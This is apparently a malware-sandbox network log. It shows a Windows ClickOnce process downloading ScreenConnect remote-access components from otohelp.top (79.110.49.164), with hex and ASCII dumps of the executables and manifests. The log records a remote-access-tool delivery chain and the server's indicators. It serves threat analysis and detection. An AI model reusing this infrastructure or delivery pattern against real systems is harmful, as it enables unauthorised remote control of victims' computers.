                                                                                                                                                Data Ascii: Nob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIHF1YWxpdHkgaWYgb
                                                                                                                                                2024-10-02 04:25:16 UTC16384INData Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 43 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 42 41 56 47 2b 72 76 36 4e 75 58 79 55 41 41 41 41 41 41 41 41 41 4a 67 45 41 41 43 42 42 41 48 41 41 63 41 42 73 41 47 6b 41 59 77 42 68 41 48 51 41 61 51 42 76 41 47 34 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 41 41 41 41 41 41 34 56 51 42 75 41 47 51 41 5a 51 42 79 41 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 51 67 42 68 41 47 34 41 62 67 42 6c 41 48 49 41 56 41 42 6c 41 48 67 41 64 41 42 47 41 47 38 41 63 67 42 74
                                                                                                                                                Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAACAAAAAAAAAFBBRFBBRFBAVG+rv6NuXyUAAAAAAAAAJgEAACBBAHAAcABsAGkAYwBhAHQAaQBvAG4AVABpAHQAbABlAAAAAAA4VQBuAGQAZQByAEMAbwBuAHQAcgBvAGwAQgBhAG4AbgBlAHIAVABlAHgAdABGAG8AcgBt
                                                                                                                                                2024-10-02 04:25:16 UTC16384INData Raw: 62 58 63 66 78 30 32 75 67 41 45 67 63 6b 5a 54 75 57 37 77 50 34 73 30 4c 68 44 46 37 69 7a 70 76 30 66 41 59 66 64 78 72 45 58 63 69 4d 55 55 4d 41 43 34 58 4d 67 38 65 36 35 75 46 71 6c 51 73 54 2f 62 52 37 6d 32 69 6f 44 6c 37 4f 4d 34 59 67 6f 59 41 43 4b 6c 4e 5a 69 4b 74 34 50 76 51 2b 68 43 6b 31 61 36 6e 32 53 49 53 73 41 52 4e 32 4b 78 43 42 6f 41 2f 69 54 74 74 53 4f 77 67 2b 39 44 36 47 36 52 49 48 51 2f 79 52 43 58 67 44 50 37 4f 4b 4a 71 78 47 49 49 43 51 41 2b 32 2f 65 30 48 59 6b 65 50 42 39 43 46 33 76 6e 57 48 55 4a 48 4a 65 41 73 2f 73 34 59 6d 72 45 59 67 67 4a 41 47 36 30 34 71 68 39 71 7a 6d 45 37 69 64 6c 53 32 41 45 48 4a 68 62 63 54 5a 69 63 51 49 4e 59 4a 36 4c 77 62 51 64 6c 78 2f 38 48 6b 4b 50 69 67 58 78 64 4a 62 79 64 78 45
                                                                                                                                                Data Ascii: bXcfx02ugAEgckZTuW7wP4s0LhDF7izpv0fAYfdxrEXciMUUMAC4XMg8e65uFqlQsT/bR7m2ioDl7OM4YgoYACKlNZiKt4PvQ+hCk1a6n2SISsARN2KxCBoA/iTttSOwg+9D6G6RIHQ/yRCXgDP7OKJqxGIICQA+2/e0HYkePB9CF3vnWHUJHJeAs/s4YmrEYggJAG604qh9qzmE7idlS2AEHJhbcTZicQINYJ6LwbQdlx/8HkKPigXxdJbydxE
                                                                                                                                                2024-10-02 04:25:16 UTC3647INData Raw: 41 48 37 6b 68 41 49 49 59 47 5a 32 4d 69 38 6a 74 41 73 4a 51 41 42 7a 61 61 39 51 46 39 4b 43 58 55 67 41 43 4f 42 63 30 7a 6a 47 73 49 78 77 7a 51 45 46 45 4d 41 6b 70 6e 47 4d 59 52 6d 68 49 6d 67 41 41 55 7a 71 43 6a 79 47 4c 69 52 46 30 41 41 43 6d 4e 51 56 65 41 7a 4c 43 46 38 36 6f 41 41 43 6d 4d 52 41 79 76 67 75 4a 45 58 51 41 41 4b 59 31 45 44 4b 75 66 68 6c 68 49 71 67 41 51 51 77 71 57 6b 63 39 2b 4f 58 45 5a 6f 45 44 53 43 41 53 51 32 6b 48 45 4d 58 6b 69 4a 6f 41 41 46 4d 36 67 72 63 37 30 4a 36 71 77 67 61 41 41 47 63 36 77 72 63 37 30 4a 36 61 42 49 30 41 41 49 34 31 30 44 4b 2b 43 36 6b 56 34 34 6e 67 41 41 6d 4e 59 30 6a 76 67 76 70 30 50 45 45 45 4d 41 6b 70 6e 47 4d 59 52 66 53 73 75 4d 4a 49 49 42 4a 58 49 48 48 73 41 76 70 32 50 45
                                                                                                                                                Data Ascii: AH7khAIIYGZ2Mi8jtAsJQABzaa9QF9KCXUgACOBc0zjGsIxwzQEFEMAkpnGMYRmhImgAAUzqCjyGLiRF0AACmNQVeAzLCF86oAACmMRAyvguJEXQAAKY1EDKufhlhIqgAQQwqWkc9+OXEZoEDSCASQ2kHEMXkiJoAAFM6grc70J6qwgaAAGc6wrc70J6aBI0AAI410DK+C6kV44ngAAmNY0jvgvp0PEEEMAkpnGMYRfSsuMJIIBJXIHHsAvp2PE


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.64971679.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:18 UTC93OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:18 UTC216INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 17866
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:18 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:18 UTC16168INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                2024-10-02 04:25:18 UTC1698INData Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55
                                                                                                                                                Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.64972379.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:22 UTC95OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:22 UTC216INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 95520
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:22 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:22 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                2024-10-02 04:25:22 UTC16384INData Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00
                                                                                                                                                Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                2024-10-02 04:25:22 UTC16384INData Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b
                                                                                                                                                Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                2024-10-02 04:25:23 UTC16384INData Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39
                                                                                                                                                Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
                                                                                                                                                2024-10-02 04:25:23 UTC16384INData Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00
                                                                                                                                                Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                2024-10-02 04:25:23 UTC13816INData Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b
                                                                                                                                                Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.64972579.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:23 UTC103OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:23 UTC216INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 61216
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:23 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:23 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
                                                                                                                                                2024-10-02 04:25:24 UTC16384INData Raw: 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19
                                                                                                                                                Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                                                2024-10-02 04:25:24 UTC16384INData Raw: 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00
                                                                                                                                                Data Ascii: ThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_Item
                                                                                                                                                2024-10-02 04:25:24 UTC12280INData Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31
                                                                                                                                                Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.64972779.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:24 UTC107OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:25 UTC214INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 266
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:24 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:25 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.64972879.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:25 UTC102OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:25 UTC214INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 266
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:24 GMT
                                                                                                                                                Connection: close
